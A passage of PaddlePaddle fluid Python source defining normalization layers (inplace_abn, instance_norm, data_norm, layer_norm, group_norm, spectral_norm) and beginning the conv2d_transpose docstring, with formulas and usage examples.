name(str|None): For detailed information, please refer to :ref:`api_guide_Name`.
Usually name is no need to set and None by default.
moving_mean_name(str, Default None): The name of moving_mean which store the global Mean. If it
is set to None, inplace_abn will save global mean with a random name, otherwise, inplace_abn
will save global mean with the string.
moving_variance_name(str, Default None): The name of the moving_variance which store the global Variance.
            If it is set to None, inplace_abn will save global variance with a random name, otherwise, inplace_abn
will save global variance with the string.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance should do model
average when model average is enabled.
use_global_stats(bool, Default False): Whether to use global mean and
variance. In inference or test mode, set use_global_stats to true
or is_test to true, and the behavior is equivalent.
In train mode, when setting use_global_stats True, the global mean
and variance are also used during train period.
        act_alpha(float, Default 1.0): when activation is one of 'elu', 'identity' or 'leaky_relu',
            in-place activation batch normalization will be used, and the alpha parameter for the
            activation can be given by this parameter.
Returns:
A Variable holding Tensor which is the result after applying batch normalization and activation on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.inplace_abn(input=hidden1)
hidden3 = fluid.layers.inplace_abn(input=hidden2, act='leaky_relu', act_alpha=0.2)
"""
assert act in [None, 'identity', 'leaky_relu', 'elu'], \
"inplace_abn only support act as None, 'identity', " \
"'leaky_relu', 'elu' currently"
assert bias_attr is not False, "bias_attr should not be False in inplace_abn."
helper = LayerHelper('inplace_abn', **locals())
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'inplace_abn')
dtype = helper.input_dtype()
has_reserve_space = False
if data_layout == 'NHWC':
flag = os.environ.get('FLAGS_cudnn_batchnorm_spatial_persistent')
if flag is not None and flag.lower() in ['true', '1']:
has_reserve_space = True
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
mean = helper.create_parameter(
attr=ParamAttr(
name=moving_mean_name,
initializer=Constant(0.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
mean.stop_gradient = True
variance = helper.create_parameter(
attr=ParamAttr(
name=moving_variance_name,
initializer=Constant(1.0),
trainable=False,
do_model_average=do_model_average_for_mean_and_var),
shape=param_shape,
dtype=dtype)
variance.stop_gradient = True
# create output
# mean and mean_out share the same memory
mean_out = mean
# variance and variance out share the same memory
variance_out = variance
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
reserve_space = None
if has_reserve_space:
reserve_space = helper.create_variable_for_type_inference(
dtype=core.VarDesc.VarType.FP16, stop_gradient=True)
batch_norm_out = input
inputs = {
"X": input,
"Scale": scale,
"Bias": bias,
"Mean": mean,
"Variance": variance
}
attrs = {
"epsilon": epsilon,
"is_test": is_test,
"data_layout": data_layout,
"use_mkldnn": False,
"fuse_with_relu": False,
"use_global_stats": use_global_stats,
"activation": act,
"alpha": act_alpha,
}
if isinstance(momentum, Variable):
inputs['MomemtumTensor'] = momentum
else:
attrs['momentum'] = momentum
outputs = {
"Y": batch_norm_out,
"MeanOut": mean_out,
"VarianceOut": variance_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
}
if reserve_space is not None:
outputs["ReserveSpace"] = reserve_space
helper.append_op(
type="inplace_abn", inputs=inputs, outputs=outputs, attrs=attrs)
return batch_norm_out
def instance_norm(input,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
name=None):
"""
**Instance Normalization Layer**
Can be used as a normalizer function for convolution or fully_connected operations.
The required data format for this layer is one of the following:
DataLayout: NCHW `[batch, in_channels, in_height, in_width]`
Refer to `Instance Normalization: The Missing Ingredient for
Fast Stylization <https://arxiv.org/pdf/1607.08022.pdf>`_
for more details.
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{HW} \\sum_{i=1}^{HW} x_i \\qquad &//\\
\\ mean\ of\ one\ feature\ map\ in\ mini-batch \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{HW} \\sum_{i=1}^{HW}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ variance\ of\ one\ feature\ map\ in\ mini-batch \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
Note:
`H` means height of feature map, `W` means width of feature map.
Args:
input(variable): The rank of input variable can be 2, 3, 4, 5.
The data type is float32 or float64.
epsilon(float, Default 1e-05): A value added to the denominator for
numerical stability. Default is 1e-5.
param_attr(ParamAttr|None): The parameter attribute for Parameter `scale`
of instance_norm. If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as param_attr, the name of scale can be set in ParamAttr.
If the Initializer of the param_attr is not set, the parameter is initialized
with Xavier. Default: None.
bias_attr(ParamAttr|None): The parameter attribute for the bias of instance_norm.
If it is set to None or one attribute of ParamAttr, instance_norm
will create ParamAttr as bias_attr, the name of bias can be set in ParamAttr.
If the Initializer of the bias_attr is not set, the bias is initialized zero.
Default: None.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
A Variable holding Tensor which is the result after applying instance normalization on the input,
has same shape and data type with input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
hidden2 = fluid.layers.instance_norm(input=hidden1)
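        A hedged sketch (the parameter names are illustrative): passing explicit
        ParamAttr objects for the scale and bias parameters.
        .. code-block:: python
            import paddle.fluid as fluid
            x = fluid.data(name='x', shape=[3, 7, 3, 7], dtype='float32')
            hidden1 = fluid.layers.fc(input=x, size=200, param_attr='fc1.w')
            hidden2 = fluid.layers.instance_norm(
                input=hidden1,
                param_attr=fluid.ParamAttr(name='in_scale'),
                bias_attr=fluid.ParamAttr(name='in_bias'))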
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'instance_norm')
assert bias_attr is not False, "bias_attr should not be False in instance_norm."
helper = LayerHelper('instance_norm', **locals())
dtype = helper.input_dtype()
# use fp32 for in parameter
if dtype == core.VarDesc.VarType.FP16:
dtype = core.VarDesc.VarType.FP32
input_shape = input.shape
channel_num = input_shape[1]
param_shape = [channel_num]
# create parameter
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
bias = helper.create_parameter(
attr=helper.bias_attr,
shape=param_shape,
dtype=dtype,
is_bias=True,
default_initializer=Constant(0.0))
# create output
saved_mean = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
saved_variance = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
instance_norm_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="instance_norm",
inputs={
"X": input,
"Scale": scale,
"Bias": bias,
},
outputs={
"Y": instance_norm_out,
"SavedMean": saved_mean,
"SavedVariance": saved_variance
},
attrs={"epsilon": epsilon, })
return instance_norm_out
def data_norm(input,
act=None,
epsilon=1e-05,
param_attr=None,
data_layout='NCHW',
in_place=False,
name=None,
moving_mean_name=None,
moving_variance_name=None,
do_model_average_for_mean_and_var=True,
slot_dim=-1,
sync_stats=False,
summary_decay_rate=0.9999999):
"""
**Data Normalization Layer**
This op can be used as a normalizer function for conv2d and fully_connected operations.
The required data format for this layer is one of the following:
1. NHWC `[batch, in_height, in_width, in_channels]`
2. NCHW `[batch, in_channels, in_height, in_width]`
:math:`input` is the input features over a mini-batch.
.. math::
\\mu_{\\beta} &\\gets \\frac{1}{m} \\sum_{i=1}^{m} x_i \\qquad &//\\
\ mini-batch\ mean \\\\
\\sigma_{\\beta}^{2} &\\gets \\frac{1}{m} \\sum_{i=1}^{m}(x_i - \\
\\mu_{\\beta})^2 \\qquad &//\ mini-batch\ variance \\\\
\\hat{x_i} &\\gets \\frac{x_i - \\mu_\\beta} {\\sqrt{\\
\\sigma_{\\beta}^{2} + \\epsilon}} \\qquad &//\ normalize \\\\
y_i &\\gets \\gamma \\hat{x_i} + \\beta \\qquad &//\ scale\ and\ shift
Args:
input(variable): The input variable which is a LoDTensor.
act(string, Default None): Activation type, linear|relu|prelu|...
        epsilon(float, Default 1e-05): A value added to the denominator for numerical stability.
param_attr(ParamAttr): The parameter attribute for Parameter `scale`.
data_layout (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
in_place(bool, Default False): Make the input and output of batch norm reuse memory.
name(string, Default None): A name for this layer(optional). If set None, the layer
will be named automatically.
moving_mean_name(string, Default None): The name of moving_mean which store the global Mean.
moving_variance_name(string, Default None): The name of the moving_variance which store the global Variance.
do_model_average_for_mean_and_var(bool, Default True): Whether parameter mean and variance
should do model average when model average is enabled.
slot_dim(int): The embedding dimension of one slot. Slot is a set of one specific feature. In pslib mode, we
distinguish feature ids by slot and pull their embeddings from parameter server (pslib). The first
            place of the embedding is the historical show number (occurrence time of this feature id with a label 0).
If the input of this op is concated by slot-wise embeddings, and the show number is zero when this slot
is new or empty, the normalization result may be impractical. To avoid this, we add slot_dim to locate
the show number and judge if the show number is zero. If so, we choose to skip normalization on this
embedding.
sync_stats(bool, Default False): When running with multiple GPU cards, using allreduce to sync the
summary messages.
summary_decay_rate(float, Default 0.9999999): The decay rate when updating summary.
Returns:
Variable: A tensor variable which is the result after applying data normalization on the input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
hidden1 = fluid.data(name="hidden1", shape=[64, 200])
hidden2 = fluid.layers.data_norm(name="hidden2", input=hidden1)
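
        The mini-batch formula shown above can be sketched with NumPy
        (illustrative only, with scale 1 and shift 0; ``x_np`` is a made-up
        array, and this mirrors the formula, not the op's internal running
        statistics):

        .. code-block:: python

            import numpy as np
            x_np = np.random.random((8, 4)).astype('float32')
            mu = x_np.mean(axis=0)                        # mini-batch mean
            sigma2 = ((x_np - mu) ** 2).mean(axis=0)      # mini-batch variance
            y_np = (x_np - mu) / np.sqrt(sigma2 + 1e-05)  # normalize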
"""
helper = LayerHelper('data_norm', **locals())
dtype = helper.input_dtype()
input_shape = input.shape
if data_layout == 'NCHW':
channel_num = input_shape[1]
else:
if data_layout == 'NHWC':
channel_num = input_shape[-1]
else:
raise ValueError("unsupported data layout:" + data_layout)
param_shape = [channel_num]
batch_size_default = 1e4
batch_sum_default = 0.0
batch_square_sum_default = 1e4
if param_attr and isinstance(param_attr, dict):
batch_size_default = param_attr.get("batch_size", 1e4)
batch_sum_default = param_attr.get("batch_sum", 0.0)
batch_square_sum_default = param_attr.get("batch_square", 1e4)
# create parameter
batch_size = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_size',
initializer=Constant(value=float(batch_size_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
batch_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_sum',
initializer=Constant(value=float(batch_sum_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
batch_square_sum = helper.create_parameter(
attr=ParamAttr(
name=name + '.batch_square_sum',
initializer=Constant(value=float(batch_square_sum_default)),
trainable=True),
shape=param_shape,
dtype=input.dtype)
means = helper.create_variable(dtype=dtype, stop_gradient=True)
scales = helper.create_variable(dtype=dtype, stop_gradient=True)
data_norm_out = input if in_place else helper.create_variable(dtype=dtype)
helper.append_op(
type="data_norm",
inputs={
"X": input,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum
},
outputs={
"Y": data_norm_out,
"Means": means,
"Scales": scales,
"BatchSize": batch_size,
"BatchSum": batch_sum,
"BatchSquareSum": batch_square_sum
},
attrs={
"epsilon": epsilon,
"slot_dim": slot_dim,
"sync_stats": sync_stats,
"summary_decay_rate": summary_decay_rate
})
return helper.append_activation(data_norm_out)
@templatedoc()
def layer_norm(input,
scale=True,
shift=True,
begin_norm_axis=1,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
name=None):
"""
**Layer Normalization Layer**
The API implements the function of the Layer Normalization Layer and can be applied to mini-batch input data.
Refer to `Layer Normalization <https://arxiv.org/pdf/1607.06450v1.pdf>`_
The formula is as follows:
.. math::
\\mu & = \\frac{1}{H}\\sum_{i=1}^{H} x_i
\\sigma & = \\sqrt{\\frac{1}{H}\sum_{i=1}^{H}{(x_i - \\mu)^2} + \\epsilon}
y & = f(\\frac{g}{\\sigma}(x - \\mu) + b)
- :math:`x`: the vector representation of the summed inputs to the neurons in that layer.
- :math:`H`: the number of hidden units in a layers
- :math:`\\epsilon`: the small value added to the variance to prevent division by zero.
- :math:`g`: the trainable scale parameter.
- :math:`b`: the trainable bias parameter.
Args:
input(Variable): A multi-dimension ``Tensor`` , and the data type is float32 or float64.
scale(bool, optional): Whether to learn the adaptive gain :math:`g` after
normalization. Default: True.
shift(bool, optional): Whether to learn the adaptive bias :math:`b` after
normalization. Default: True.
begin_norm_axis(int, optional): The normalization will be performed along
dimensions from :attr:`begin_norm_axis` to :attr:`rank(input)`.
Default: 1.
epsilon(float, optional): The small value added to the variance to prevent
division by zero. Default: 1e-05.
param_attr(ParamAttr, optional): The parameter attribute for the learnable
gain :math:`g`. If :attr:`scale` is False, :attr:`param_attr` is
omitted. If :attr:`scale` is True and :attr:`param_attr` is None,
a default :code:`ParamAttr` would be added as scale. The
:attr:`param_attr` is initialized as 1 if it is added. Default: None.
bias_attr(ParamAttr, optional): The parameter attribute for the learnable
bias :math:`b`. If :attr:`shift` is False, :attr:`bias_attr` is
            omitted. If :attr:`shift` is True and :attr:`bias_attr` is None,
a default :code:`ParamAttr` would be added as bias. The
:attr:`bias_attr` is initialized as 0 if it is added. Default: None.
act(str, optional): Activation to be applied to the output of layer normalization.
Default: None.
name(str): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: ``Tensor`` indicating the normalized result, the data type is the same as ``input`` , and the return dimension is the same as ``input`` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
x = fluid.data(name='x', shape=[-1, 32, 32], dtype='float32')
hidden1 = fluid.layers.layer_norm(input=x, begin_norm_axis=1)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
            np_x = np.random.random(size=(8, 32, 32)).astype('float32')
output = exe.run(feed={"x": np_x}, fetch_list = [hidden1])
print(output)
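
        A minimal NumPy sketch of the formula above (illustrative only, with
        gain g=1 and bias b=0; ``np_x`` is a made-up array with the same shape
        as the feed above):

        .. code-block:: python

            import numpy as np
            np_x = np.random.random(size=(8, 32, 32)).astype('float32')
            flat = np_x.reshape(np_x.shape[0], -1)   # flatten dims from begin_norm_axis=1
            mu = flat.mean(axis=1, keepdims=True)
            sigma = np.sqrt(((flat - mu) ** 2).mean(axis=1, keepdims=True) + 1e-05)
            np_out = ((flat - mu) / sigma).reshape(np_x.shape)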
"""
assert in_dygraph_mode(
) is not True, "please use LayerNorm instead of layer_norm in dygraph mode!"
helper = LayerHelper('layer_norm', **locals())
dtype = helper.input_dtype()
    # create input and parameters
inputs = {'X': input}
input_shape = input.shape
param_shape = [reduce(lambda x, y: x * y, input_shape[begin_norm_axis:])]
if scale:
assert param_attr is not False, "param_attr should not be False when using scale."
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
inputs['Scale'] = scale
else:
if param_attr:
warnings.warn("param_attr is only available with scale is True.")
if shift:
assert bias_attr is not False, "bias_attr should not be False when using shift."
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
inputs['Bias'] = bias
else:
if bias_attr:
warnings.warn("bias_attr is only available with shift is True.")
# create output
mean_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable_for_type_inference(
dtype=dtype, stop_gradient=True)
layer_norm_out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="layer_norm",
inputs=inputs,
outputs={
"Y": layer_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={"epsilon": epsilon,
"begin_norm_axis": begin_norm_axis})
return helper.append_activation(layer_norm_out)
@templatedoc()
def group_norm(input,
groups,
epsilon=1e-05,
param_attr=None,
bias_attr=None,
act=None,
data_layout='NCHW',
name=None):
"""
**Group Normalization Layer**
Refer to `Group Normalization <https://arxiv.org/abs/1803.08494>`_ .
Parameters:
input(Variable): 4-D Tensor, the data type is float32 or float64.
groups(int): The number of groups that divided from channels, the data type
is int32.
epsilon(float, optional): The small value added to the variance to prevent
division by zero, the data type is float32. Default: 1e-05.
param_attr(ParamAttr|bool, optional): ParamAttr object that specifies weight parameter
attribute. If a bool type, only False is supported, which means there is no weight parameter.
Default: None, the default weight parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
bias_attr(ParamAttr|bool, optional): ParamAttr object that specifies bias parameter
attribute. If a bool type, only False is supported, which means there is no bias parameter.
Default: None, the default bias parameter attribute is used. For more information, please
refer to :ref:`api_guide_ParamAttr` .
act(str, optional): Activation to be applied to the output of group normalization.
data_layout(str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name (str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
        Variable: A 4-D Tensor with the same data type and data format as `input`.
Raises:
ValueError: If `data_layout` is neither 'NCHW' nor 'NHWC'.
ValueError: If `groups` is greater than the number of input channels.
ValueError: If `groups` is less than 1.
ShapeError: If the param_attr(Scale) is not 1-D Tensor.
ShapeError: If the param_attr(Scale)'s first dimension size is not equal to the input channels.
ShapeError: If the bias_attr(Bias) is not 1-D Tensor.
ShapeError: If the bias_attr(Bias)'s first dimension size is not equal to the input channels.
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 8, 32, 32], dtype='float32')
x = fluid.layers.group_norm(input=data, groups=4)
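
        The grouping and normalization can be sketched with NumPy as follows
        (illustrative only, with scale 1 and bias 0; ``x_np`` is a made-up
        NCHW array):

        .. code-block:: python

            import numpy as np
            N, C, H, W, G = 2, 8, 32, 32, 4
            x_np = np.random.random((N, C, H, W)).astype('float32')
            g = x_np.reshape(N, G, C // G, H, W)          # split channels into groups
            mean = g.mean(axis=(2, 3, 4), keepdims=True)
            var = g.var(axis=(2, 3, 4), keepdims=True)
            y_np = ((g - mean) / np.sqrt(var + 1e-05)).reshape(N, C, H, W)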
"""
helper = LayerHelper('group_norm', **locals())
dtype = helper.input_dtype()
    # create input and parameters
inputs = {'X': input}
input_shape = input.shape
if data_layout != 'NCHW' and data_layout != 'NHWC':
raise ValueError(
"Param(data_layout) of Op(fluid.layers.group_norm) got wrong value: received "
+ data_layout + " but only NCHW or NHWC supported.")
channel_num = input_shape[1] if data_layout == 'NCHW' else input_shape[-1]
param_shape = [channel_num]
if param_attr:
scale = helper.create_parameter(
attr=helper.param_attr,
shape=param_shape,
dtype=dtype,
default_initializer=Constant(1.0))
inputs['Scale'] = scale
if bias_attr:
bias = helper.create_parameter(
attr=helper.bias_attr, shape=param_shape, dtype=dtype, is_bias=True)
inputs['Bias'] = bias
# create output
mean_out = helper.create_variable(dtype=dtype, stop_gradient=True)
variance_out = helper.create_variable(dtype=dtype, stop_gradient=True)
group_norm_out = helper.create_variable(dtype=dtype)
helper.append_op(
type="group_norm",
inputs=inputs,
outputs={
"Y": group_norm_out,
"Mean": mean_out,
"Variance": variance_out,
},
attrs={
"epsilon": epsilon,
"groups": groups,
"data_layout": data_layout
})
return helper.append_activation(group_norm_out)
@templatedoc()
def spectral_norm(weight, dim=0, power_iters=1, eps=1e-12, name=None):
"""
**Spectral Normalization Layer**
This operation calculates the spectral normalization value of weight parameters of
fc, conv1d, conv2d, conv3d layers which should be 2-D, 3-D, 4-D, 5-D
    Parameters. The output tensor will have the same shape as the input tensor.
    Calculations are shown as follows.
Step 1:
Generate vector U in shape of [H], and V in shape of [W].
        where H is the size of the :attr:`dim`-th dimension of the input weight,
        and W is the product of the sizes of the remaining dimensions.
Step 2:
        :attr:`power_iters` should be a positive integer; do the following
        calculations with U and V for :attr:`power_iters` rounds:
.. math::
\mathbf{v} := \\frac{\mathbf{W}^{T} \mathbf{u}}{\|\mathbf{W}^{T} \mathbf{u}\|_2}
        \mathbf{u} := \\frac{\mathbf{W} \mathbf{v}}{\|\mathbf{W} \mathbf{v}\|_2}
Step 3:
Calculate :math:`\sigma(\mathbf{W})` and normalize weight values.
.. math::
\sigma(\mathbf{W}) = \mathbf{u}^{T} \mathbf{W} \mathbf{v}
\mathbf{W} = \\frac{\mathbf{W}}{\sigma(\mathbf{W})}
Refer to `Spectral Normalization <https://arxiv.org/abs/1802.05957>`_ .
Args:
weight(${weight_type}): ${weight_comment}
dim(int): ${dim_comment}
power_iters(int): ${power_iters_comment}
eps(float): ${eps_comment}
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable: A tensor variable of weight parameters after spectral normalization.
        The data type and shape are the same as the input tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
weight = fluid.data(name='weight', shape=[2, 8, 32, 32], dtype='float32')
x = fluid.layers.spectral_norm(weight=weight, dim=1, power_iters=2)
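
        The power iteration in Steps 1-3 can be sketched with NumPy (a rough,
        illustrative implementation only; ``w_np`` is a made-up 2-D weight
        with dim=0, so H=8 and W=32):

        .. code-block:: python

            import numpy as np
            w_np = np.random.randn(8, 32).astype('float32')
            u = np.random.randn(8).astype('float32')
            for _ in range(2):                        # power_iters rounds
                v = w_np.T.dot(u)
                v /= (np.linalg.norm(v) + 1e-12)
                u = w_np.dot(v)
                u /= (np.linalg.norm(u) + 1e-12)
            sigma = u.dot(w_np).dot(v)                # estimated spectral norm
            w_sn = w_np / sigma                       # normalized weight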
"""
helper = LayerHelper('spectral_norm', **locals())
check_variable_and_dtype(weight, 'weight', ['float32', 'float64'],
'spectral_norm')
check_type(dim, 'dim', int, 'spectral_norm')
check_type(power_iters, 'power_iters', int, 'spectral_norm')
check_type(eps, 'eps', float, 'spectral_norm')
dtype = weight.dtype
    # create input and parameters
inputs = {'Weight': weight}
input_shape = weight.shape
h = input_shape[dim]
w = np.prod(input_shape) // h
u = helper.create_parameter(
attr=ParamAttr(),
shape=[h],
dtype=dtype,
default_initializer=Normal(0., 1.))
u.stop_gradient = True
inputs['U'] = u
v = helper.create_parameter(
attr=ParamAttr(),
shape=[w],
dtype=dtype,
default_initializer=Normal(0., 1.))
inputs['V'] = v
v.stop_gradient = True
# create output
out = helper.create_variable(dtype=dtype)
helper.append_op(
type="spectral_norm",
inputs=inputs,
outputs={"Out": out, },
attrs={
"dim": dim,
"power_iters": power_iters,
"eps": eps,
})
return out
def conv2d_transpose(input,
num_filters,
output_size=None,
filter_size=None,
padding=0,
stride=1,
dilation=1,
groups=None,
param_attr=None,
bias_attr=None,
use_cudnn=True,
act=None,
name=None,
data_format='NCHW'):
"""
The convolution2D transpose layer calculates the output based on the input,
filter, and dilations, strides, paddings. Input(Input) and output(Output)
are in NCHW or NHWC format. Where N is batch size, C is the number of channels,
H is the height of the feature, and W is the width of the feature.
Parameters(dilations, strides, paddings) are two elements. These two elements
    represent height and width, respectively. For details of the convolution transpose
    layer, please refer to the following explanation and the references
    `therein <https://arxiv.org/pdf/1603.07285.pdf>`_.
If bias attribution and activation type are provided, bias is added to
the output of the convolution, and the corresponding activation function
is applied to the final result.
For each input :math:`X`, the equation is:
.. math::
Out = \sigma (W \\ast X + b)
Where:
* :math:`X`: Input value, a 4-D Tensor with NCHW or NHWC format.
* :math:`W`: Filter value, a 4-D Tensor with MCHW format.
* :math:`\\ast`: Convolution operation.
* :math:`b`: Bias value, a 2-D Tensor with shape [M, 1].
* :math:`\\sigma`: Activation function.
* :math:`Out`: Output value, a 4-D Tensor with data format 'NCHW' or 'NHWC', the shape of :math:`Out` and :math:`X` may be different.
Example:
- Input:
Input shape: :math:`(N, C_{in}, H_{in}, W_{in})`
Filter shape: :math:`(C_{in}, C_{out}, H_f, W_f)`
- Output:
Output shape: :math:`(N, C_{out}, H_{out}, W_{out})`
Where
.. math::
H^\prime_{out} &= (H_{in} - 1) * strides[0] - pad_height_top - pad_height_bottom + dilations[0] * (H_f - 1) + 1 \\\\
W^\prime_{out} &= (W_{in} - 1) * strides[1] - pad_width_left - pad_width_right + dilations[1] * (W_f - 1) + 1 \\\\
H_{out} &\in [ H^\prime_{out}, H^\prime_{out} + strides[0] ] \\\\
W_{out} &\in [ W^\prime_{out}, W^\prime_{out} + strides[1] ]
Note:
The conv2d_transpose can be seen as the backward of the conv2d. For conv2d,
        when stride > 1, conv2d maps multiple input shapes to the same output shape,
        so for conv2d_transpose, when stride > 1, one input shape maps to multiple output shapes.
        If output_size is None, :math:`H_{out} = H^\prime_{out}, W_{out} = W^\prime_{out}`;
        else, the :math:`H_{out}` of the output size must be between :math:`H^\prime_{out}`
        and :math:`H^\prime_{out} + strides[0]`, and the :math:`W_{out}` of the output size must
        be between :math:`W^\prime_{out}` and :math:`W^\prime_{out} + strides[1]`; in this case,
        conv2d_transpose can compute the kernel size automatically.
Args:
input(Variable): 4-D Tensor with [N, C, H, W] or [N, H, W, C] format,
its data type is float32 or float64.
num_filters(int): The number of the filter. It is as same as the output
image channel.
output_size(int|tuple, optional): The output image size. If output size is a
tuple, it must contain two integers, (image_height, image_width). None if use
filter_size, padding, and stride to calculate output_size.
            If output_size and filter_size are specified at the same time, they
should follow the formula above. Default: None. output_size and filter_size
should not be None at the same time.
filter_size(int|tuple, optional): The filter size. If filter_size is a tuple,
it must contain two integers, (filter_size_height, filter_size_width).
Otherwise, filter_size_height = filter_size_width = filter_size. None if
use output size to calculate filter_size. Default: None. filter_size and
output_size should not be None at the same time.
stride(int|tuple, optional): The stride size. It means the stride in transposed convolution.
If stride is a tuple, it must contain two integers, (stride_height, stride_width).
Otherwise, stride_height = stride_width = stride. Default: stride = 1.
padding(int|list|str|tuple, optional): The padding size. The padding argument effectively adds
`dilation * (kernel - 1)` amount of zero-padding on both sides of input. If `padding` is a
string, either 'VALID' or 'SAME' supported, which is the padding algorithm.
If `padding` is a tuple or list, it could be in three forms:
`[pad_height, pad_width]` or
`[pad_height_top, pad_height_bottom, pad_width_left, pad_width_right]`, and
when `data_format` is `'NCHW'`,
`padding` can be in the form `[[0,0], [0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right]]`.
when `data_format` is `'NHWC'`, `padding` can be in the form
`[[0,0], [pad_height_top, pad_height_bottom], [pad_width_left, pad_width_right], [0,0]]`.
Default: padding = 0.
dilation(int|tuple, optional): The dilation size. It means the spacing between the kernel points.
If dilation is a tuple, it must contain two integers, (dilation_height, dilation_width).
Otherwise, dilation_height = dilation_width = dilation. Default: dilation = 1.
groups(int, optional): The groups number of the Conv2d transpose layer. Inspired by
grouped convolution in Alex Krizhevsky's Deep CNN paper, in which
when group=2, the first half of the filters is only connected to the
first half of the input channels, while the second half of the
filters is only connected to the second half of the input channels.
Default: groups = 1.
param_attr (ParamAttr, optional): The parameter attribute for learnable parameters/weights
of conv2d_transpose. If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as param_attr. If the Initializer of the param_attr
is not set, the parameter is initialized with Xavier. Default: None.
bias_attr (ParamAttr|bool, optional): The parameter attribute for the bias of conv2d_transpose.
If it is set to False, no bias will be added to the output units.
If it is set to None or one attribute of ParamAttr, conv2d_transpose
will create ParamAttr as bias_attr. If the Initializer of the bias_attr
is not set, the bias is initialized zero. Default: None.
use_cudnn(bool, optional): Use cudnn kernel or not, it is valid only when the cudnn
library is installed. Default: True.
act (str, optional): Activation type, if it is set to None, activation is not appended.
Default: None.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
A Variable holding Tensor representing the conv2d_transpose, whose
        data type is the same as input and shape is (num_batches, channels, out_h,
out_w) or (num_batches, out_h, out_w, channels). If act is None, the tensor variable
storing the transposed convolution result, and if act is not None, the
tensor variable storing transposed convolution and non-linearity activation
result.
Raises:
ValueError: If the type of `use_cudnn` is not bool.
ValueError: If `data_format` is not "NCHW" or "NHWC".
ValueError: If `padding` is a string, but not "SAME" or "VALID".
ValueError: If `padding` is a tuple, but the element corresponding to the input's batch size is not 0
or the element corresponding to the input's channel is not 0.
ValueError: If `output_size` and filter_size are None at the same time.
ShapeError: If the input is not 4-D Tensor.
ShapeError: If the input's dimension size and filter's dimension size not equal.
ShapeError: If the dimension size of input minus the size of `stride` is not 2.
ShapeError: If the number of input channels is not equal to filter's channels.
ShapeError: If the size of `output_size` is not equal to that of `stride`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
